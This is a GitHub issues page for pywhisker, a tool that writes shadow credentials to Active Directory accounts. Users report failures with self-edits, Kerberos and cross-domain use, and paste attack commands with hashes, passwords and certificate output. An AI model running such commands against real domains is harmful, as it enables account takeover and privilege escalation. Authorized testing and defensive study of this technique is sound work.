pywhisker's People

Contributors

cclauss, evanmcbroom, mitchmoser, p0dalirius, shutdownrepo, snovvcrash, tahiti, zamanry

pywhisker's Issues

Computer accounts cannot edit their own msDS-KeyCredentialLink

While on an engagement I was not able to get a computer account to add shadow credentials to itself. Was this fixed by Microsoft?

pywhisker -t 'vm-dc02$' -a add -d domain.local -u 'VM-DC02$' -H BAB0BB5F7A058A24AE91003A0B80DFDD --dc-ip 192.168.0.100   
[*] Searching for the target account
[*] Target user found: CN=VM-DC02,OU=Domain Controllers,DC=domain,DC=local
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: ec2f3908-666b-5f5f-c2bf-0fa4cfe41c6f
[*] Updating the msDS-KeyCredentialLink attribute of vm-dc02$
[!] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-031514B3, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0

However, I was able to add shadow credentials as the domain admin:

pywhisker -t 'vm-dc02$' -a add -d domain.local -u Administrator -p 'S3cr3tp4ssw0rd' --dc-ip 192.168.0.100
[*] Searching for the target account
[*] Target user found: CN=VM-DC02,OU=Domain Controllers,DC=domain,DC=local
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 21f07708-fffa-26d0-02b0-03c397165d69
[*] Updating the msDS-KeyCredentialLink attribute of vm-dc02$
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: diJE4LLY.pfx
[*] Must be used with password: tHlLzQkOY2jHGFzauf3Y
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

I also checked for any existing shadow credentials for the targeted computer account but there weren't any.

Is -k working?

Hi. Thank you very much for your time writing this tool!

I can successfully add shadow credentials when authenticating using a plaintext password, but when I try the same using Kerberos authentication on the same machine in the same "session", it fails with "invalid server address". I have tested all kinds of variations of the parameters, such as "-d [domain]" and "--dc-ip [DC IP]", in various locations of the command, but I always get the same error. Note that I have no issues using, for example, Impacket's secretsdump script with Kerberos in the same environment.

I also noted that you have not used the "-k" parameter in any of your examples here so I cannot check my command against an example.

Add Spray Action README Support

Thank you for this great Python port! The README has not been updated to include the --action spray. I swore that the tool supported it, but couldn't find it until I read the PRs: #6

This addition would help others realize faster that this tool supports this great feature like the C# ShadowSpray tool.

Unable to write shadow credentials across domains (and forests if that is supported)

Hi,

Thank you for this tool.

During testing of the new cross-domain shadow credential writing I encountered an issue. As you can see in the pictures, adlab.local\adlab_shadow1 has full control of child.adlab.local\child_domainuser1 but still the writing of shadow credentials fails due to insufficient rights. I have no issues writing shadow credentials within a domain.

The trust involved is a parent-child trust where adlab.local is the parent domain and child.adlab.local is the child domain.


Write msds-keycredentiallink with cross-forest ticket

When I need to generate a certificate from domainA.contoso.local to target victimuser in domainB.contoso.local, I use an NT hash for authentication with this command:
python3 pywhisker.py -a add -d domainA.contoso.local -u admin -H :<nthash> -t victimuser -td domainB.contoso.local
All fine.
But in my case LDAP signing + channel binding is enabled on domainB, and I can't authenticate with NTLM, because I get the error strongerAuthRequired.
And when I request a ticket for [email protected] and then use the command:
python3 pywhisker.py -a add -d domainA.contoso.local -u admin -k --dc-ip <dc ip domainB.contoso.local> -t victimuser -td domainB.contoso.local
I get the error KDC_ERR_WRONG_REALM.
I know that this version of ldap3 can solve this problem https://github.com/ThePirateWhoSmellsOfSunflowers/ldap3/tree/tls_cb_and_seal_for_ntlm.
I tried to do it myself, but I couldn't succeed.
